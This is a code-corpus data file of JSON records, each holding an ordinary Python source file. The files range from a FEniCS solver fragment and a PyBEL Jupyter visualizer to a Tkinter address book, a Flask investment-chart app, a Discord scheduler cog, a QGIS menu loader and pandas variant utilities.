generator for a tuple of\n        the interval and the current solution.\n\n        *Arguments*\n          interval (:py:class:`tuple`)\n            The time interval for the solve given by (t0, t1)\n          dt (float, optional)\n            The timestep for the solve. Defaults to length of interval\n\n        *Returns*\n          (timestep, solution_field) via (:py:class:`genexpr`)\n\n        *Example of usage*::\n\n          # Create generator\n          solutions = solver.solve((0.0, 1.0), 0.1)\n\n          # Iterate over generator (computes solutions as you go)\n          for (interval, solution_fields) in solutions:\n            (t0, t1) = interval\n            v_, v = solution_fields\n            # do something with the solutions\n        \"\"\"\n        for interval in time_stepper(t0=t0, t1=t1, dt=dt):\n            # info(\"Solving on t = (%g, %g)\" % (t0, t1))\n            self.step(*interval)  # unpack (t0, t1)\n\n            # Yield solutions\n            yield interval, self.solution_fields()\n\n            # Update elsewhere???\n            self._v_prev.assign(self._v)\n\n    def _update_solver(self, dt: float) -> None:\n        \"\"\"Update the lhs matrix if timestep changes.\"\"\"\n        if (abs(dt - float(self._timestep)) < 1e-12):\n            return\n        self._timestep.assign(df.Constant(dt))\n\n        # Reassemble matrix\n        df.assemble(self._lhs, tensor=self._lhs_matrix)\n","sub_path":"experiments/mirrored/coupled_monodomain.py","file_name":"coupled_monodomain.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"629240568","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Utilities for displaying graphs with inline HTML in Jupyter Notebooks\"\"\"\n\nfrom random import sample\n\nfrom IPython.display import Javascript\n\nfrom pybel.io import to_jsons\nfrom .utils import render_template, default_color_map\nfrom ..mutation import add_canonical_names\n\n__all__ = ['to_jupyter', 'to_jupyter_str']\n\nDEFAULT_WIDTH = 1000\nDEFAULT_HEIGHT = 650\n\n\ndef generate_id():\n    \"\"\"Generates a random string of letters\"\"\"\n    return \"\".join(sample('abcdefghjkmopqrstuvqxyz', 16))\n\n\ndef to_jupyter(graph, width=DEFAULT_WIDTH, height=DEFAULT_HEIGHT, color_map=None):\n    \"\"\"Displays the BEL graph inline in a Jupyter notebook.\n\n    To use successfully, run it as the last statement in a cell inside a Jupyter notebook.\n\n    :param pybel.BELGraph graph: A BEL graph\n    :param width: The width of the visualization window to render\n    :type width: int\n    :param height: The height of the visualization window to render\n    :type height: int\n    :param color_map: A dictionary from 
PyBEL internal node functions to CSS color strings like #FFEE00. Defaults\n to :data:`default_color_map`\n :type color_map: dict\n :return: An IPython notebook Javascript object\n :rtype: :class:`IPython.display.Javascript`\n \"\"\"\n return Javascript(to_jupyter_str(graph, width=width, height=height, color_map=color_map))\n\n\ndef to_jupyter_str(graph, width=DEFAULT_WIDTH, height=DEFAULT_HEIGHT, color_map=None):\n \"\"\"Returns the string to be javascript-ified by the Jupyter notebook function :class:`IPython.display.Javascript`\n\n :param pybel.BELGraph graph: A BEL graph\n :param width: The width of the visualization window to render\n :type width: int\n :param height: The height of the visualization window to render\n :type height: int\n :param color_map: A dictionary from PyBEL internal node functions to CSS color strings like #FFEE00. Defaults\n to :data:`default_color_map`\n :type color_map: dict\n :return: The javascript string to turn into magic\n :rtype: str\n \"\"\"\n add_canonical_names(graph)\n gjson = to_jsons(graph)\n\n d3_code = render_template('pybel_vis.js')\n chart_id = generate_id()\n\n color_map = default_color_map if color_map is None else color_map\n\n javascript_vars = \"\"\"\n var chart = \"{}\";\n var width = {};\n var height = {};\n var graph = {};\n const color_map = {};\n \"\"\".format(chart_id, width, height, gjson, color_map)\n\n require_code = \"\"\"\n require.config({\n paths: {\n d3: '//cdnjs.cloudflare.com/ajax/libs/d3/4.5.0/d3.min'\n }\n });\n\n var elementInnerHTML = \"
\";\n\n element.append(elementInnerHTML);\n\n var chartQualified = \"#\" + chart;\n\n require(['d3'], function(d3) {\n return init_d3_force(d3, graph, chartQualified, width, height, color_map);\n });\n \"\"\"\n\n result = d3_code + javascript_vars + require_code\n\n return result\n","sub_path":"src/pybel_tools/visualization/inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"441613776","text":"def attemptsDefinition(buildingFloors):\n\n ## GETS number of floors the building has\n ## RETURNS the maximum less attempts you could try for finding the break floor\n\n maxAttempts = 0\n checkAttempts = 0\n\n while True:\n maxAttempts += 1\n for x in range(maxAttempts):\n checkAttempts = checkAttempts + maxAttempts - x\n if checkAttempts > buildingFloors: break\n checkAttempts = 0\n\n return maxAttempts\n\ndef showChecks(buildingFloors, breakFloor, maxAttempts):\n\n ## GETS the break floor and the maximum less attempts you could try for finding the break floor\n ## PRINTS the way to find the break floor\n\n x = 0\n index = 0\n checkAttempts = 0\n\n while checkAttempts < breakFloor:\n checkAttempts = checkAttempts + maxAttempts - x\n x += 1\n if checkAttempts < breakFloor:\n index += 1\n print(str(index) + \". Thrown from floor \" + str(checkAttempts) + \" and NOT broke\")\n elif checkAttempts < buildingFloors:\n if index is 0:\n index = 1\n print(str(index) + \". Thrown from floor \" + str(checkAttempts) + \" and BROKE\")\n\n y = checkAttempts - maxAttempts + x\n while True:\n index += 1\n if y >= breakFloor:\n print(str(index) + \". Thrown from floor \" + str(y) + \" and BROKE - the choosen floor !!\")\n break\n else:\n print(str(index) + \". Thrown from floor \" + str(y) + \" and NOT broke\")\n y += 1\n\nprint(\"QUESTION:\\n*** You've got 2 eggs for finding from which floor the eggs will break.\")\nprint(\"*** Find the less maximum attempts you should take for throwing the eggs and finding this floor.\")\n\nerrorMsg = \"ILLEGAL VALUE\"\n\nwhile True:\n try:\n buildingFloors = int(input(\"* ENTER How many floors has this building? \"))\n break\n except ValueError:\n print(errorMsg)\n\nwhile True:\n try:\n breakFloor = int(input(\"* ENTER Which floor to find? 
\"))\n if breakFloor > buildingFloors: raise ValueError()\n break\n except ValueError:\n print(errorMsg)\n\nmaxAttempts = attemptsDefinition(buildingFloors)\nprint(\"\\nANSWER:\\n*** The maximum attempts for any floor in this building: \" + str(maxAttempts))\nshowChecks(buildingFloors, breakFloor, maxAttempts)\n\ninput(\"\\n* PRESS ENTER to exit \")\n","sub_path":"(1)Eggs.py","file_name":"(1)Eggs.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"225083605","text":"\n\nfrom xai.brain.wordbase.nouns._reformation import _REFORMATION\n\n#calss header\nclass _REFORMATIONS(_REFORMATION, ):\n\tdef __init__(self,): \n\t\t_REFORMATION.__init__(self)\n\t\tself.name = \"REFORMATIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"reformation\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_reformations.py","file_name":"_reformations.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"113480456","text":"from multiprocessing import Pool, cpu_count\nfrom multiprocessing.pool import ThreadPool\nimport socket\nserver = socket.socket()\nserver.bind(('',8888))\nserver.listen(200) #并发\n#处理对等连接\ndef worker_thread(conn):\n while True:\n recv_data = conn.recv(1024)\n if recv_data:\n conn.send(recv_data)\n else:\n conn.close()\n break\n##处理server连接\ndef worker_process(server):\n threadpool = ThreadPool(cpu_count())\n\n while True:\n conn,addr = server.accept()\n threadpool.apply_async(worker_thread,(conn,))\n # threadpool.close()\n # threadpool.join()\nn = cpu_count()\npool =Pool(n)\nfor i in range(n):\n pool.apply_async(worker_process,args=(server,),kwds={})\npool.close()\npool.join()\n\n","sub_path":"00000003并发/20180628 Pool/pypool.py","file_name":"pypool.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"47188538","text":"from tkinter import *\nfrom tkinter import messagebox\n\nimport sqlite3 \n\ncon = sqlite3.connect('database.db')\ncur = con.cursor()\n\n\nclass AddPeople(Toplevel):\n def __init__(self):\n Toplevel.__init__(self)\n \n self.geometry(\"650x550+600+200\")\n self.title(\"Add New person\")\n self.resizable(False,False)\n\n\n self.top = Frame(self,height=\"150\",bg=\"white\")\n self.top.pack(fill=X)\n \n self.bottom = Frame(self,heigh='500',bg='powder blue')\n self.bottom.pack(fill = X)\n\n # Image\n self.top_img = PhotoImage(file='icon/people.png')\n self.top_img_label = Label(self.top,image=self.top_img,bg='white')\n self.top_img_label.place(x=70,y=25)\n\n\n #Heading\n self.top_heading = Label(self.top,text=\"Add New person\",font=\"arial 20 bold\",bg = 'white', fg=\"#ebb434\")\n self.top_heading.place(x=150,y=30)\n \n # name \n self.name = Label(self.bottom,text=\"Name\",font=\"arial 15 bold\")\n self.name.place (x=40,y=40)\n\n self.name_entry = Entry(self.bottom,width=30,bd=4)\n self.name_entry.insert(0,\"enter name\")\n self.name_entry.place(x=150,y=40)\n \n # Name\n\n self.name = Label(self.bottom,text=\"Name:\",font=\"arial 15 bold\",bg=\"powder blue\")\n self.name.place (x=40,y=40)\n #Name Entyr\n self.name_entry = Entry(self.bottom,width=30,bd=4)\n self.name_entry.insert(0,\"Enter Name\")\n self.name_entry.place(x=150,y=40)\n # Sure Name\n self.surename = Label(self.bottom,text=\"Surename:\",font =\"arial 15 bold\",bg=\"powder blue\")\n self.surename.place(x=40,y=80)\n #Sure_name 
Entry\n self.surename_entry = Entry(self.bottom,width=30,bd=4)\n self.surename_entry.insert(0,\"Enter Surename\")\n self.surename_entry.place(x=150,y=80)\n #Email\n self.email = Label(self.bottom,text='Email:',font = \"arial 15 bold\",bg =\"powder blue\" )\n self.email.place(x = 40,y=120)\n #email entry\n self.email_entry = Entry(self.bottom,widt=30,bd = 4)\n self.email_entry.insert(0,\"Enter Email\")\n self.email_entry.place(x=150,y=120)\n # Phone number\n self.phone = Label(self.bottom,text=\"Phone:\",font = \"arial 15 bold\",bg = \"powder blue\")\n self.phone.place(x=40,y=160)\n #Phone Entry\n self.phone_entry = Entry(self.bottom,bd =4,width=30)\n self.phone_entry.insert(0,\"Enter Phone Numebr\")\n self.phone_entry.place(x=150,y=160)\n #Address \n self.address = Label(self.bottom,text=\"Address:\",font = \"arial 15 bold\",bg = \"powder blue\")\n self.address.place(x=40,y=200)\n #Phone Entry\n self.address_entry = Text(self.bottom,bd = 4,width=30,height=6)\n \n self.address_entry.place(x=150,y=200)\n\n self.botton = Button(self.bottom,text=\"Add person\",bd=5,command = self.add_people)\n self.botton.place(x=300,y = 320)\n\n\n def add_people(self):\n name = self.name_entry.get()\n surename = self.surename_entry.get()\n email = self.email_entry.get()\n phone = self.phone_entry.get()\n address = self.address_entry.get(1.0,'end-1c')\n \n if name and surename and email and phone and address != '' :\n # add to database\n try:\n # insutrt into addressbook(Person_name.Person_surename,Person_email,Person_phone,Person_address)\n \n query = \"insert into 'addressbook'(Person_name,Person_surename,Person_email,Person_phone,Person_address) values(?,?,?,?,?)\"\n \n cur.execute(query,(name,surename,email,phone,address))\n con.commit()\n messagebox.showinfo(\"Success\",\"Content added\")\n except EXCEPTION as e :\n messagebox.showinfo(\"Error\",str(e)) \n\n else:\n messagebox.showerror(\"Error\",\"Fill all the Fields\", icon=\"warning\")\n\n \n\n\n\n\n ","sub_path":"add_people.py","file_name":"add_people.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"596953938","text":"\nimport os\nimport tempfile\nimport argparse\nimport json\n\ndef my_func():\n parser = argparse.ArgumentParser(description=\"store the data in storage\")\n parser.add_argument(\"--key\", type=str, help=\"the key\")\n parser.add_argument(\"--val\", help=\"the value\")\n args = parser.parse_args()\n\n if not os.path.exists(os.path.join(tempfile.gettempdir(), 'storage.data')):\n d = {}\n if args.key and args.val:\n d[args.key] = []\n d[args.key].append(args.val)\n storage_path = os.path.join(tempfile.gettempdir(), 'storage.data')\n\n with open(storage_path, 'w') as f:\n json.dump(d, f)\n \n \n else:\n with open(os.path.join(tempfile.gettempdir(), 'storage.data')) as feed:\n d = json.load(feed)\n\n if args.key and args.val:\n if args.key not in d.keys():\n d[args.key] = []\n d[args.key].append(args.val)\n elif args.key in d.keys():\n d[args.key].append(args.val)\n with open(os.path.join(tempfile.gettempdir(), 'storage.data'), 'w') as f:\n json.dump(d, f)\n\n\n if args.key and not args.val:\n with open(os.path.join(tempfile.gettempdir(), 'storage.data')) as json_file:\n data = json.load(json_file)\n if data.get(args.key) != None:\n print(*(data.get(args.key)), sep=', ')\n else:\n print('')\n\nif __name__ == \"__main__\":\n 
my_func()","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"247351028","text":"# Import the PyQt and QGIS libraries\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\nimport qgis.utils\nimport os.path\nimport datetime\n\nimport xml.etree.ElementTree as ET\n\nfrom ..tools import Tools\nfrom ..data.requests.menuItem import MenuItem\n\n\nclass DataMenu:\n\n ###############################\n def __init__(self, layout):\n # TODO assert treeview\n self.view = QTreeView()\n layout.addWidget(self.view)\n\n self.view.setUniformRowHeights(True)\n self.view.setHeaderHidden(True)\n self.view.setSelectionMode(QAbstractItemView.NoSelection)\n self.view.setExpandsOnDoubleClick(False)\n self.view.setRootIsDecorated(False)\n\n # self.view.setAttribute(Qt.WA_NoMousePropagation)\n self.view.pressed.connect(self.handleDataMenuPressed)\n # self.view.clicked.connect(self.handleDataMenuClicked)\n # self.view.activated.connect(self.handleDataMenuActivated)\n\n self.viewModel = QStandardItemModel()\n self.view.setModel(self.viewModel)\n\n self.loadMenuData()\n\n # def loadMenuData(self): #pre-search version\n def loadMenuData(self, text=\"\"):\n Tools.dataMenuDict = {}\n self.viewModel.clear()\n\n # load from v drive\n # corpMenuSuccess = self.parseMenu() #pre-search version\n corpMenuSuccess = self.parseMenu(\"\", text)\n\n # check for XP\n userFiles = os.path.expanduser(\"~\")\n if \"Users\" in userFiles:\n # win7\n userFile = userFiles + \"/Documents/\" + Tools.menuFileName\n else:\n #xp\n userFile = userFiles + \"/My Documents/\" + Tools.menuFileName\n\n personalMenuSuccess = False\n # check file exists\n if os.path.isfile(userFile):\n # personalMenuSuccess = self.parseMenu(userFile) #pre-search version\n personalMenuSuccess = self.parseMenu(userFile, text)\n\n if not (corpMenuSuccess or personalMenuSuccess):\n #Tools.logError(\"Unable to load menu.xml files.\\nPlease check your V: drive is mapped or USB drive connected.\\nIf these are correct please check the settings under QGIS Tools > Tools > Settings > Data Locations.\")\n Tools.debug(\"Unable to load menu.xml files.\\nPlease check your V: drive is mapped or USB drive connected.\\nIf these are correct please check the settings under QGIS Tools > Tools > Settings > Data Locations.\")\n###########################################\n\n def handleDataMenuPressed(self, index):\n \"\"\" Action a MenuItem or expand/collapse a menu branch as required. 
\"\"\"\n assert isinstance(index, QModelIndex), \"Bad Parameter\"\n\n mouseState = QApplication.mouseButtons()\n if (mouseState == Qt.RightButton):\n index = self.viewModel.index(0, 0)\n self.view.setCurrentIndex(index)\n self.view.collapseAll()\n return\n\n Tools.cddpTechnique = \"menu\"\n modelNode = self.viewModel.itemFromIndex(index)\n\n if (modelNode.columnCount() == 0):\n # menu leaf, will correspond with a menu item\n Tools.selectTopLegendItem()\n menuItem = Tools.dataMenuDict[Tools.getModelNodePath(modelNode)]\n menuItem.doLoad()\n # Tools.checkForOTFReprojection();\n else:\n # menu branch, will correspond with a menu branch\n self.view.setExpanded(index, not self.view.isExpanded(index))\n Tools.flushErrors()\n\n\n############################################################\n # def parseMenuElement(self, XMLMenuElement, targetModel): #pre search version\n def parseMenuElement(self, XMLMenuElement, targetModel, text):\n \"\"\" Attach a node to the targetModel then populate it with data from the XMLMenuElement. \"\"\"\n assert isinstance(XMLMenuElement, ET.Element), \"Bad Parameter\"\n assert (isinstance(targetModel, QStandardItemModel) or\n isinstance(targetModel, QStandardItem)), \"Bad Parameter\" + str(type(targetModel))\n\n modelNode = QStandardItem()\n modelNode.setIcon(Tools.iconFolder)\n targetModel.appendRow(modelNode)\n modelNode.setFlags(Qt.ItemIsEnabled)\n modelNode.setText(Tools.getAttributeFromElement(XMLMenuElement, \"TITLE\"))\n\n for child in XMLMenuElement:\n tag = child.tag.lower()\n if tag[0] == \"q\":\n tag = tag[1:]\n elif tag[0] == \"a\":\n continue\n if (tag == \"menu\"):\n # self.parseMenuElement(child,modelNode) #pre search version\n self.parseMenuElement(child, modelNode, text)\n elif (tag == \"item\"):\n # MenuItem.parseXML(child,modelNode) #pre search version\n MenuItem.parseXML(child, modelNode, text)\n else:\n # unknown xml\n Tools.logError(\"Menu Error: unknown xml element \" + tag)\n\n # validate menu element\n if modelNode.rowCount() == 0:\n # Tools.logError(\"Menu Error: No children found for \" + modelNode.text())\n targetModel.removeRow(targetModel.rowCount() - 1)\n\n\n########################\n # def parseMenu(self,xmlLocation=\"\"): #pre search version\n def parseMenu(self, xmlLocation=\"\", text=\"\"):\n noise = False\n if xmlLocation == \"\":\n xmlLocation = os.path.join(Tools.corpMenuLocation, Tools.menuFileName)\n\n if xmlLocation != \"\":\n tree = ET.parse(xmlLocation)\n root = tree.getroot()\n for child in root:\n tag = child.tag.lower()\n if tag[0] == \"q\":\n tag = tag[1:]\n elif tag[0] == \"a\":\n continue\n if (tag == \"menu\"):\n # self.parseMenuElement(child, self.viewModel) #pre search version\n self.parseMenuElement(child, self.viewModel, text)\n elif (tag == \"item\"):\n # MenuItem.parseXML(child,self.viewModel) #pre search version\n MenuItem.parseXML(child, self.viewModel, text)\n # self.parseMenuElement(child,self.viewModel)\n else:\n # unknown xml\n Tools.logError(\"Menu Error: unknown xml element \" + tag)\n if len(text) >= 3:\n self.view.expandAll()\n return True\n else:\n return False\n","sub_path":"i18n/ymac/gis/qgis/ui/datamenu.py","file_name":"datamenu.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"388301012","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"feri-urnik\",\n version=\"1.0.0\",\n author=\"Urban Knupleš\",\n 
author_email=\"urbikn@gmail.com\",\n description=\"A FERI schedule running in CLI\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/urbikn/feri-urnik\",\n packages=setuptools.find_packages(),\n license='MIT',\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Office/Business :: Scheduling\",\n \"Operating System :: POSIX :: Linux\",\n ],\n keywords='FERI, urnik, scheduler, Wise timetable, timetable, iCal, CLI',\n python_requires='>=3.6',\n include_package_data=True,\n install_requires=['selenium', 'icalevents==0.1.25 ', 'pyyaml', 'fuzzywuzzy', 'Unidecode==1.1.1', \"python-Levenshtein\"],\n package_data={\n 'urnik': [\"*.yaml\", 'data/*.tar.gz'],\n },\n entry_points={\n 'console_scripts': [\n 'urnik= urnik.main:main',\n ],\n },\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"427712060","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import (Flask, jsonify, render_template, request)\nfrom flask import render_template\nfrom flask_cors import CORS\nimport investlib.invest as invest\n\napp = Flask(__name__)\nCORS(app)\napp.config['SECRET_KEY'] = 'Hello from the secret world of Flask! ;)'\n\n\n@app.route(\"/\")\ndef handle_index():\n return (render_template('index.html'))\n\n\n@app.route(\"/chart\", methods=[\"GET\", \"POST\"])\ndef handle_chart_generate():\n print(\"Request data: \", request.args)\n user_data = request.args.to_dict(flat=True)\n\n user_input = {\n 'start_balance': 10000,\n 'buy_threshold': 1.0,\n 'sell_threshold': 1.0,\n 'stock_price': 100,\n 'buy_batch': 10,\n 'sell_batch': 10,\n 'transactions': 1000,\n 'stock': 'SPY',\n 'start_date': '2010-01-01',\n 'end_date': '2020-12-31',\n 'price_type': 'close',\n 'frequency': 'weekly'\n }\n for key,value in user_data.items():\n user_input[key] = value\n\n\n print(\"Final user innput to investlib: \", user_input)\n\n obj = invest.run_stock_iterations(user_data['stock'], **user_input)\n\n return jsonify(obj)\n\n\ndef main():\n app.run(host='127.0.0.1', port=5006, debug=True)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"invest_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"188716423","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom . 
import Language\n\n\nclass LanguageHistory(models.Model):\n # CHOICES\n\n # DATABASE FIELDS\n # Foreign Keys\n editor = models.ForeignKey(\n get_user_model(),\n on_delete=models.PROTECT,\n related_name='language_histories',\n related_query_name='language_history',\n verbose_name=_('Editor Id')\n )\n language = models.ForeignKey(\n Language,\n on_delete=models.CASCADE,\n related_name='language_histories',\n related_query_name='language_history',\n verbose_name=_('Language Id')\n )\n # Fields\n name = models.CharField(\n _('Language Name'),\n max_length=100,\n help_text=_(\"Name of the language.\")\n )\n native_name = models.CharField(\n _('Native Language Name'),\n max_length=100,\n help_text=_(\"Name of language and written in native of it's Language\")\n )\n iso_639_1 = models.CharField(\n _('ISO 639-1'),\n max_length=2,\n help_text=_('more info in Wikipedia.')\n )\n iso_639_2 = models.CharField(\n _('ISO 639-2'),\n max_length=3,\n help_text=_('more info in Wikipedia.')\n )\n description = models.TextField(\n _('Description'),\n blank=True,\n help_text=_(\"Description about the language.\")\n )\n timestamp = models.DateTimeField(\n _('Edited Timestamp'),\n auto_now_add=True\n )\n\n # MANAGERS\n objects = models.Manager()\n\n # META CLASS\n class Meta:\n verbose_name = _('language history')\n verbose_name_plural = _('languages histories')\n\n # TO STRING METHOD\n def __str__(self):\n return self.name\n\n # SAVE METHOD\n def save(self, *args, **kwargs):\n # do_something()\n super().save(*args, **kwargs)\n # do_something_else()\n\n # ABSOLUTE URL METHOD\n # def get_absolute_url(self):\n # return reverse('language-detail', kwargs={'pk': self.id})\n\n # OTHER METHODS\n","sub_path":"language/models/languageHistory.py","file_name":"languageHistory.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4521170","text":"from functools import wraps\nfrom threading import RLock\nfrom types import FunctionType, MethodType\n\nfrom graphility.database import Database\nfrom graphility.database_safe_shared import th_safe_gen\nfrom graphility.env import cdb_environment\n\ncdb_environment[\"mode\"] = \"threads\"\ncdb_environment[\"rlock_obj\"] = RLock\n\n\nclass SuperLock(type):\n @staticmethod\n def wrapper(f):\n @wraps(f)\n def _inner(*args, **kwargs):\n db = args[0]\n with db.super_lock:\n return f(*args, **kwargs)\n\n return _inner\n\n def __new__(cls, classname, bases, attr):\n new_attr = {}\n for base in bases:\n for b_attr in dir(base):\n a = getattr(base, b_attr, None)\n if isinstance(a, MethodType) and not b_attr.startswith(\"_\"):\n if b_attr in (\"flush\", \"flush_indexes\"):\n pass\n else:\n new_attr[b_attr] = SuperLock.wrapper(a)\n for attr_name, attr_value in attr.items():\n if isinstance(attr_value, FunctionType) and not attr_name.startswith(\"_\"):\n attr_value = SuperLock.wrapper(attr_value)\n new_attr[attr_name] = attr_value\n new_attr[\"super_lock\"] = RLock()\n return type.__new__(cls, classname, bases, new_attr)\n\n\nclass SuperThreadSafeDatabase(Database, metaclass=SuperLock):\n \"\"\"\n Thread safe version that always allows single thread to use db.\n It adds the same lock for all methods, so only one operation can be\n performed in given time. 
Completely different implementation\n than ThreadSafe version (without super word)\n \"\"\"\n\n __metaclass__ = SuperLock\n\n def __patch_index_gens(self, name):\n ind = self.indexes_names[name]\n for c in (\"all\", \"get_many\"):\n m = getattr(ind, c)\n if getattr(ind, c + \"_orig\", None):\n return\n m_fixed = th_safe_gen.wrapper(m, name, c, self.super_lock)\n setattr(ind, c, m_fixed)\n setattr(ind, c + \"_orig\", m)\n\n def open(self, *args, **kwargs):\n res = super(SuperThreadSafeDatabase, self).open(*args, **kwargs)\n for name, _ in self.indexes_names.items():\n self.__patch_index_gens(name)\n return res\n\n def create(self, *args, **kwargs):\n res = super(SuperThreadSafeDatabase, self).create(*args, **kwargs)\n for name, _ in self.indexes_names.items():\n self.__patch_index_gens(name)\n return res\n\n def add_index(self, *args, **kwargs):\n res = super(SuperThreadSafeDatabase, self).add_index(*args, **kwargs)\n self.__patch_index_gens(res)\n return res\n\n def edit_index(self, *args, **kwargs):\n res = super(SuperThreadSafeDatabase, self).edit_index(*args, **kwargs)\n self.__patch_index_gens(res)\n return res\n","sub_path":"graphility/database_super_thread_safe.py","file_name":"database_super_thread_safe.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"214806006","text":"import asyncio\nfrom datetime import datetime, timezone\n\nfrom discord.ext import commands\n\nclass ScheduledTask:\n def __init__(self, trigger_time, action, args):\n self.trigger_time = trigger_time\n self.action = action\n self.args = args\n\n\nscheduled_tasks = []\n\n\ndef add_task(trigger_time, action, args):\n scheduled_tasks.append(ScheduledTask(trigger_time, action, args))\n\n\nclass ExecutorCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.version = \"0.1\"\n self.loop = asyncio.get_event_loop()\n self.task = self.loop.create_task(self.periodic_task_check())\n\n async def periodic_task_check(self):\n while True:\n tasks_to_execute = []\n for task in scheduled_tasks:\n if task.trigger_time < datetime.utcnow():\n tasks_to_execute.append(task)\n for task in tasks_to_execute:\n await task.action(**task.args)\n scheduled_tasks.remove(task)\n await asyncio.sleep(15)\n\n def cog_unload(self):\n self.task.cancel()\n\n\ndef setup(bot):\n bot.add_cog(ExecutorCog(bot))\n\n\ndef teardown(bot):\n bot.remove_cog(ExecutorCog(bot))\n","sub_path":"src/tbdbot/cogs/scheduled_tasks.py","file_name":"scheduled_tasks.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52976626","text":"\"\"\" Pass\n\"\"\" \nimport numpy as np\nimport pandas as pd\nfrom bx.intervals.intersection import Intersecter, Interval\nfrom collections import defaultdict\nfrom IPython import embed\n\n\ndef fuzzy_ends(df):\n tdf = df.loc[:, ['outer_start', 'start','inner_start']]\n sstart = tdf.apply(np.min, axis=1)\n df.loc[:,'sstart'] = sstart.astype(np.int32)\n tdf = df.loc[:, ['outer_stop', 'stop','inner_stop']]\n sstop = tdf.apply(np.max, axis=1)\n df.loc[:, 'sstop'] = sstop.astype(np.int32)\n return(df)\n\n\n\ndef fuzzy_diff(df):\n \"\"\" This was the third try for this, still\n very slow. 
\n \"\"\"\n sstart = np.zeros(df.shape[0], dtype=np.int64)\n sstop = np.zeros(df.shape[0], dtype=np.int64)\n enum = 0\n for _, j in df.iterrows():\n if not pd.isnull(j['outer_start']):\n sstart[enum] = j['outer_start']\n else:\n try:\n sstart[enum] = j['start']\n except ValueError:\n sstart[enum] = j['inner_start']\n if not pd.isnull(j['outer_stop']):\n sstop[enum] = j['outer_stop']\n else:\n try:\n sstop[enum] = j['stop']\n except ValueError:\n sstop[enum] = j['inner_stop']\n enum += 1\n df.loc[:,'sstart'] = sstart\n df.loc[:,'sstop'] = sstop\n return(df)\n\n\ndef filter_by_size(df, max_size=3e6):\n '''\n '''\n df = fuzzy_ends(df)\n diff = (df.sstop - df.sstart)\n df = df.ix[diff < float(max_size), :]\n return(df)\n\n\ndef generate_unique_mapping(udf, df, \n ncollisions=3, nstudies=2):\n ''' Exact matching by sstop and sstart\n '''\n hits_uids = []\n comp_dict = {}\n for _, j in udf.iterrows():\n comp_dict[(j['chr'], j['var_type'],\n j.sstart, j.sstop)] = j.uID\n\n for _, j in df.iterrows():\n try:\n hits_uids.append(comp_dict[(j['chr'],\n j['var_type'],\n j.sstart, j.sstop)])\n except KeyError:\n # there shouldn't bee any key errors\n hits_uids.append('missing')\n '''\n qstring = ('sstart > {0} & '\n 'sstop <= {1} & '\n 'chr == {2}'\n 'var_type == {3}'\n )\n qtest = udf.query(qstring.format(j.sstart, \n j.sstop, j.chr))\n embed()\n '''\n pass\n df['uID'] = hits_uids\n return(df)\n\n\ndef reverse_dictionary(dictionary):\n new_dict = {}\n for i, j in dictionary.iteritems():\n for k in j:\n new_dict[k] = i\n return(new_dict)\n \n\ndef remove_singleton_exp_variants(df, study_dict,\n nstudies=2):\n \"\"\"\n \"\"\"\n ugroups = df.groupby('uID')\n \n more_than_one = []\n uid_index = []\n study_list = []\n for name, group in ugroups:\n studies = [study_dict[i] for i in group.index]\n study_list.extend(studies)\n studies = set(studies)\n uid_index.append(name)\n if len(studies) >= nstudies:\n more_than_one.append(True)\n print('Yes')\n else:\n more_than_one.append(False)\n out_s = pd.Series(more_than_one, index = uid_index)\n return(out_s, study_list)\n\n\n\ndef copy_test(df):\n \"\"\" Copy number variant testing\n \"\"\"\n # :TODO change to groups\n dfg = ((df['var_type'] == 'copy number gain') |\\\n ( df['var_type'] == 'copy number loss') |\\\n ( df['var_type'] == 'copy number variation'))\n # append together\n cnv = df.ix[dfg, :]\n return(cnv) \n","sub_path":"py/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 